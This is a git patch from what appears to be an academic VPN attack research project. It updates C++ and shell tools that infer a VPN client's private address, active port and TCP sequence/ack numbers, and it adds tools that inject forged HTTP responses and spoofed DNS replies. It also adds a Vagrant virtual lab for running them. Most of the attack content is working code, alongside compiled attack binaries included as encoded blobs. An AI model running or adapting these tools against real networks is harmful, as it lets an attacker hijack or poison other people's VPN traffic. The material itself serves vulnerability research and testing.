From 0a4e3bb7147dbc4d5c8ba26ffb7725eb0e2071ad Mon Sep 17 00:00:00 2001 From: Beau Kujath Date: Thu, 6 May 2021 14:43:00 -0600 Subject: [PATCH] added client side attack env to virtual lab and server side tcp --- client-side-attack/complete_attack/attack.sh | 31 +- .../first_phase/phase_one_attack.sh | 10 - client-side-attack/first_phase/send.cpp | 41 +- client-side-attack/sec_phase/send.cpp | 51 +- client-side-attack/third_phase/send.cpp | 57 +- .../dns-sside/full_scan/send.cpp | 10 +- .../dns-sside/full_scan/uud_send | Bin 0 -> 61568 bytes .../dns-sside/phases/udder_fillup/Makefile | 2 - .../phases/udder_fillup/fill_log.txt | 23545 ---------------- .../dns-sside/phases/udder_fillup/fillup.blah | 26 - .../dns-sside/phases/udder_fillup/send.cpp | 165 - .../dns-sside/phases/udder_fillup/uud_send | Bin 43736 -> 0 bytes .../tcp-sside/{ => conn_inf}/Makefile | 0 .../tcp-sside/{ => conn_inf}/send.cpp | 70 +- .../tcp-sside/conn_inf/tcp_send | Bin 0 -> 43488 bytes server-side-attack/tcp-sside/inject/Makefile | 2 + server-side-attack/tcp-sside/inject/send.cpp | 695 + server-side-attack/tcp-sside/inject/send_p3 | Bin 0 -> 61624 bytes .../{virt-lab => }/.gitignore | 0 virtual-test-environment/README.md | 82 +- virtual-test-environment/boot_all.sh | 15 + .../configs/configure_vpn.sh | 29 + .../configs/setup_cliside_env.sh | 15 + .../configs/setup_servside_env.sh | 24 + .../machines/default/virtualbox/vagrant_cwd | 1 - .../edgers/client/Vagrantfile | 6 +- .../edgers/client/copy_client_config.sh | 2 +- .../edgers/client/setup_net.sh | 12 + .../ubuntu-xenial-16.04-cloudimg-console.log | 650 - .../edgers/setups/attacker/setup_attacker.sh | 2 +- .../edgers/setups/disable_rp_filter.sh | 12 + .../edgers/setups/vpn_server/setup_vpn.sh | 74 +- .../machines/default/virtualbox/vagrant_cwd | 1 - .../edgers/vpn-server/Vagrantfile | 3 +- .../edgers/vpn-server/copy_vpn_setup.sh | 2 +- .../edgers/vpn-server/setup_net.sh | 1 + .../ubuntu-xenial-16.04-cloudimg-console.log | 653 - .../machines/default/virtualbox/vagrant_cwd | 1 - .../edgers/web-server/Vagrantfile | 2 +- .../ubuntu-xenial-16.04-cloudimg-console.log | 648 - .../machines/default/virtualbox/vagrant_cwd | 1 - .../routers/gateway/Vagrantfile | 2 +- .../routers/gateway/copy_attacker_setup.sh | 11 + .../ubuntu-xenial-16.04-cloudimg-console.log | 654 - .../machines/default/virtualbox/vagrant_cwd | 1 - .../routers/router1/Vagrantfile | 4 +- .../routers/router1/copy_attacker_setup.sh | 2 +- .../ubuntu-xenial-16.04-cloudimg-console.log | 666 - .../machines/default/virtualbox/vagrant_cwd | 1 - .../routers/router2/Vagrantfile | 4 +- .../ubuntu-xenial-16.04-cloudimg-console.log | 672 - .../machines/default/virtualbox/vagrant_cwd | 1 - .../routers/router3/Vagrantfile | 4 +- .../ubuntu-xenial-16.04-cloudimg-console.log | 663 - virtual-test-environment/start_all.sh | 22 - virtual-test-environment/stop_all.sh | 8 - 56 files changed, 1072 insertions(+), 28584 deletions(-) delete mode 100755 client-side-attack/first_phase/phase_one_attack.sh create mode 100755 server-side-attack/dns-sside/full_scan/uud_send delete mode 100644 server-side-attack/dns-sside/phases/udder_fillup/Makefile delete mode 100644 server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt delete mode 100755 server-side-attack/dns-sside/phases/udder_fillup/fillup.blah delete mode 100644 server-side-attack/dns-sside/phases/udder_fillup/send.cpp delete mode 100755 server-side-attack/dns-sside/phases/udder_fillup/uud_send rename server-side-attack/tcp-sside/{ => conn_inf}/Makefile (100%) rename server-side-attack/tcp-sside/{ => conn_inf}/send.cpp (75%) create mode 100755 server-side-attack/tcp-sside/conn_inf/tcp_send create mode 100644 server-side-attack/tcp-sside/inject/Makefile create mode 100644 server-side-attack/tcp-sside/inject/send.cpp create mode 100755 server-side-attack/tcp-sside/inject/send_p3 rename virtual-test-environment/{virt-lab => }/.gitignore (100%) create mode 100755 virtual-test-environment/configs/configure_vpn.sh create mode 100755 virtual-test-environment/configs/setup_cliside_env.sh create mode 100755 virtual-test-environment/configs/setup_servside_env.sh delete mode 100644 virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log create mode 100755 virtual-test-environment/edgers/setups/disable_rp_filter.sh delete mode 100644 virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log delete mode 100644 virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log delete mode 100644 virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd create mode 100755 virtual-test-environment/routers/gateway/copy_attacker_setup.sh delete mode 100644 virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log delete mode 100644 virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log delete mode 100644 virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log delete mode 100644 virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd delete mode 100644 virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log diff --git a/client-side-attack/complete_attack/attack.sh b/client-side-attack/complete_attack/attack.sh index a452ec8..0c3d238 100755 --- a/client-side-attack/complete_attack/attack.sh +++ b/client-side-attack/complete_attack/attack.sh @@ -1,16 +1,17 @@ -REMOTE_ADDR=$1 -REMOTE_PORT=80 +REMOTE_ADDR=192.168.3.2 # ip of web-server to check for connection +REMOTE_PORT=8080 # web server port -VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip -WLAN_GATEWAY=192.168.12.1 # address of local network gateway -VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically +VICTIM_WLAN_ADDR=172.16.4.2 # vpn client wlan ip +WLAN_GATEWAY=172.16.4.254 # address of local network gateway +VICTIM_PRIV_NET=10.8.0.0 PRIV_NETMASK=255.255.255.0 REQUEST_SIZE=529 -DEST_MAC=a4:34:d9:53:92:c4 -INTERFACE=wlp1s0 +DEST_MAC=08:00:27:e8:bf:1f +INTERFACE=enp0s9 + +printf "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" -echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo `date` echo "attempting to infer client's private VPN address.." @@ -18,20 +19,24 @@ echo "attempting to infer client's private VPN address.." cd ../first_phase -PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)" +PRIV_IP="$(sudo ./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)" echo "phase 1 client private IP: ${PRIV_IP}" -echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + echo `date` echo "determining if client is talking to ${REMOTE_ADDR} on any port.." cd ../sec_phase -VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)" + +VPORT="$(sudo ./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $INTERFACE)" echo "phase 2 port result: ${VPORT}" -echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" echo `date` echo "beginning phase 3 to infer sequence and ack numbers needed to inject.." cd ../third_phase -./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE + +sudo ./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE $INTERFACE + echo `date` diff --git a/client-side-attack/first_phase/phase_one_attack.sh b/client-side-attack/first_phase/phase_one_attack.sh deleted file mode 100755 index 42b3267..0000000 --- a/client-side-attack/first_phase/phase_one_attack.sh +++ /dev/null @@ -1,10 +0,0 @@ -#/bin/bash - -./phase_one_attack 52:54:00:12:ae:4c\ - 52:54:00:12:ae:3f\ - 10.7.1.0\ - 255.255.255.0\ - 192.168.64.1\ - ens5\ - 35220\ - 443 diff --git a/client-side-attack/first_phase/send.cpp b/client-side-attack/first_phase/send.cpp index f4e21ab..525a64c 100644 --- a/client-side-attack/first_phase/send.cpp +++ b/client-side-attack/first_phase/send.cpp @@ -1,35 +1,3 @@ -/* - * Modified from http://libtins.github.io/examples/syn-scanner/ - * - * INCLUDED COPYRIGHT - * Copyright (c) 2016, Matias Fontanini - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are - * met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * * Redistributions in binary form must reproduce the above - * copyright notice, this list of conditions and the following disclaimer - * in the documentation and/or other materials provided with the - * distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT - * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, - * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT - * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - * - */ - #include #include #include @@ -116,9 +84,10 @@ void Scanner::launch_sniffer() { sniffer.sniff_loop(make_sniffer_handler(this, &Scanner::callback)); } -/* Our scan handler. This will receive SYN-ACKS and inform us - * the scanned port's status. - */ + +// Handle sniffed packets until we find a response +// with a potential private tun IP address +// bool Scanner::callback(PDU& pdu) { // Find the layers we want. const IP &ip = pdu.rfind_pdu(); // Grab IP layer of sniffed packet @@ -141,7 +110,7 @@ void Scanner::run() { pthread_t thread; // Launch our sniff thread. pthread_create(&thread, 0, &Scanner::thread_proc, this); - // Start sending SYNs to port. + // Start sending SYNs to possible private IPs send_synacks(); // Wait for our sniffer. diff --git a/client-side-attack/sec_phase/send.cpp b/client-side-attack/sec_phase/send.cpp index 00749d0..f6621df 100644 --- a/client-side-attack/sec_phase/send.cpp +++ b/client-side-attack/sec_phase/send.cpp @@ -17,12 +17,12 @@ bool sniffed_chack = false; bool is_running = true; bool verbose = false; bool count_chacks = false; -bool quick_mode = true; // if true we don't recheck the port +bool quick_mode = false; // if true we don't recheck the port int num_sent = 0; string victim_wlan_addr; string remote_addr; - +string interface; void print_divider(int count) { @@ -36,30 +36,30 @@ void print_divider(int count) { bool handle_packet(PDU &some_pdu) { const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + // keep track of the last port we spoofed if (ip.src_addr() == remote_addr) current_spoof_port = some_pdu.rfind_pdu().dport(); + if (ip.src_addr() == victim_wlan_addr) { // the packet is a response from the client const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); - //cout << "sniffed something: " < (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr)\n"; + if (argc != 7) { + cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, iface)\n"; return 0; } @@ -222,6 +226,8 @@ int main(int argc, char** argv) { //verbose = true; string dest_mac = argv[5]; + interface = argv[6]; + string src_mac = ""; print_divider(2); @@ -231,7 +237,6 @@ int main(int argc, char** argv) { int p = find_port(dest_mac, src_mac, remote_addr, sport, dest_ip); is_running = false; sniff_thread.detach(); - //sniff_thread.join(); print_divider(1); if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n"; diff --git a/client-side-attack/third_phase/send.cpp b/client-side-attack/third_phase/send.cpp index f75bbf1..e701514 100644 --- a/client-side-attack/third_phase/send.cpp +++ b/client-side-attack/third_phase/send.cpp @@ -31,7 +31,7 @@ bool show = false; bool testing = true; // if using netcat set to true, else false int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request -std::string victim_wlan_addr, dest_ip, remote_addr; +std::string victim_wlan_addr, dest_ip, remote_addr, interface; int sport, dport, request_size, chack_count; @@ -47,10 +47,13 @@ void print_divider(int count) { } } +// Injects a malicious payload with the exact seq +// and in-window ack inferred before +// int inject_junk(long exact_seq, long in_win_ack) { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n

Just some junk here..

"; @@ -81,7 +84,7 @@ int inject_junk(long exact_seq, long in_win_ack) { bool rechack(long seq, long ack, int num_checks) { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); count_chacks = true; EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; @@ -104,7 +107,7 @@ bool rechack(long seq, long ack, int num_checks) { while (count < num_checks) { sender.send(pkt, iface); num_sent ++; - usleep(1000000 / 2 * 1.2); // must sleep half second due to chack rate limit + usleep(1000000 / 2 * 1.2); // must sleep half second due to chall-ack rate limit count ++; } @@ -131,7 +134,7 @@ bool rechack(long seq, long ack, int num_checks) { long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; TCP& tcp = pkt.rfind_pdu(); @@ -190,10 +193,10 @@ long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) { long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); // Loop over ack space sending empty push-acks - // that user the in window sequence number found before + // that use the in window sequence number found before // EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; @@ -213,7 +216,7 @@ long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size best_ack = 0; - while (j > min_ack && chack_count < chack_trigs) { // was && !sniffed_chack + while (j > min_ack && chack_count < chack_trigs) { usleep(send_delay); tcp.ack_seq(j); @@ -309,7 +312,7 @@ long quack_spread(long in_win_seq) { long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); long max_seq = top_seq; long adder = prev_block_size * delay_mult; @@ -352,7 +355,7 @@ bool handle_packet(PDU &some_pdu) { const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); //cout << payload << "\n"; - if (payload == 79) { // each triggered chall-ack is 79 length SSL vs ovpn and ubuntu 19 + if (payload == 115) { // each triggered chall-ack is 115 length SSL if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n"; if (count_chacks) chack_count += 1; if (track_nums) possible_acks.push_back(current_spoof_ack); @@ -380,9 +383,8 @@ bool handle_packet(PDU &some_pdu) { const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); //cout << payload << "\n"; - const int remainder = payload % 67; - if (payload == 79) { + if (payload == 115) { // each triggered chall-ack is 115 length SSL if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n"; @@ -417,10 +419,12 @@ bool handle_packet(PDU &some_pdu) { return true; } + + void sniff_stuff() { SnifferConfiguration config; config.set_promisc_mode(true); - Sniffer sniffer("wlp1s0", config); + Sniffer sniffer(interface, config); sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack } @@ -463,7 +467,7 @@ long try_seq_block(long current_seq) { current_seq = best_seq; wait_count = 0; - long s2 = find_seq_block(1055, 20, 50, 600, current_seq); // for browser went from 300 to 600 + long s2 = find_seq_block(1055, 20, 50, 600, current_seq); while (best_seq == current_seq) { usleep(500000); @@ -472,18 +476,18 @@ long try_seq_block(long current_seq) { if (wait_count > 5) return -1; } - return best_seq - 10000; // subtract 10k for wifi delay + return best_seq; } // Gets rough estimate of sequence number in use -// by spreading entire sequence range quicly then +// by spreading entire sequence range quickly then // tries to find in win sequence using each // long find_in_win_seq() { PacketSender sender; - NetworkInterface iface("wlp1s0"); + NetworkInterface iface(interface); long start_seq_guess = 1; long max_seq_num = 4294967295; @@ -591,11 +595,11 @@ long find_in_win_ack(long in_win_seq) { track_nums = false; // clack has been consistently within 40k of next ack while testing but - // in practical use it needs to be less than the expected ack by at most - // 20k to be accepted as a valid ack, so here we add 20k to counter our delay - // but we could add a third ack scan to make it more accurate + // it needs to be less than the expected ack by at most 20k to be + // accepted as a valid ack, so here we add 30k to counter our delay + // but a third ack scan could be added to make it more accurate // - long in_win_ack = clack + 30000; // adding extra 30k for wifi delay + long in_win_ack = clack + 30000; return in_win_ack; } @@ -643,12 +647,10 @@ int phase_three_spread() { usleep(1000000 / 2); long in_win_ack = find_in_win_ack(in_win_seq); - in_win_ack += 40000; // add 40k for wifi delay cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n"; - // jump back 40 for wifi delay - long exact_seq = find_exact_seq(in_win_seq - 40, in_win_ack, 100000) + 1; // should be one less than left edge + long exact_seq = find_exact_seq(in_win_seq, in_win_ack, 100000) + 1; // should be one less than left edge cout << "final exact seq guess: " << exact_seq << "\n"; cout << "total number of packets sent: " << num_sent << "\n"; print_divider(2); @@ -669,8 +671,8 @@ int phase_three_spread() { int main(int argc, char** argv) { - if (argc != 8) { - cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size)\n"; + if (argc != 9) { + cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size, iface)\n"; return 0; } @@ -681,14 +683,13 @@ int main(int argc, char** argv) { dest_mac = argv[5]; dport = atoi(argv[6]); request_size = atoi(argv[7]); - + interface = argv[8]; thread sniff_thread(sniff_stuff); print_divider(2); int r = phase_three_spread(); sniff_thread.detach(); - //sniff_thread.join(); return 0; } diff --git a/server-side-attack/dns-sside/full_scan/send.cpp b/server-side-attack/dns-sside/full_scan/send.cpp index c4fe785..60f338e 100644 --- a/server-side-attack/dns-sside/full_scan/send.cpp +++ b/server-side-attack/dns-sside/full_scan/send.cpp @@ -227,7 +227,6 @@ int port_spread(string source_ip, int sport, string dest_ip, int start_port, int IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload); current_spoof_port = spoof_port; - //udp.dport(spoof_port); // set the packets dest port to current guess int round_sends = 0; while (round_sends < 4) { // send 4 at a time then sleep again @@ -490,7 +489,7 @@ int send_dns(string src_ip, int sport, string dest_ip, int dport) { cout << "Attempting to inject dns response on port " << dport << "\n\n"; - string spoof_domain = "yo.com"; + string spoof_domain = "test.com"; string redirect_ip = "22.22.22.22"; injecting = true; @@ -560,7 +559,7 @@ int find_ports(string source_ip, int sport, string dest_ip, int start_port, int if (exact_port == 0) is_found = true; else { - cout << "found some exact port: " << exact_port << "\n\n"; + cout << "found exact port: " << exact_port << "\n\n"; print_time(); send_dns(source_ip, sport, dest_ip, exact_port); @@ -597,7 +596,7 @@ int main(int argc, char** argv) { source_ip = argv[1]; // dns server IP int sport = atoi(argv[2]); // most likely 53 dest_ip = argv[3]; // vpn server IP - verbose = true; + //verbose = true; int start_port = atoi(argv[4]); // Linux ephemeral range is (32768, 60999) int end_port = atoi(argv[5]); @@ -609,9 +608,6 @@ int main(int argc, char** argv) { int res = find_ports(source_ip, sport, dest_ip, start_port, end_port); - //sniff_thread.join(); - //send_sniff_thread.join(); - sniff_thread.detach(); send_sniff_thread.detach(); diff --git a/server-side-attack/dns-sside/full_scan/uud_send b/server-side-attack/dns-sside/full_scan/uud_send new file mode 100755 index 0000000000000000000000000000000000000000..8b52e1132d90ad1960bccce21b47d68478b81806 GIT binary patch literal 61568 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 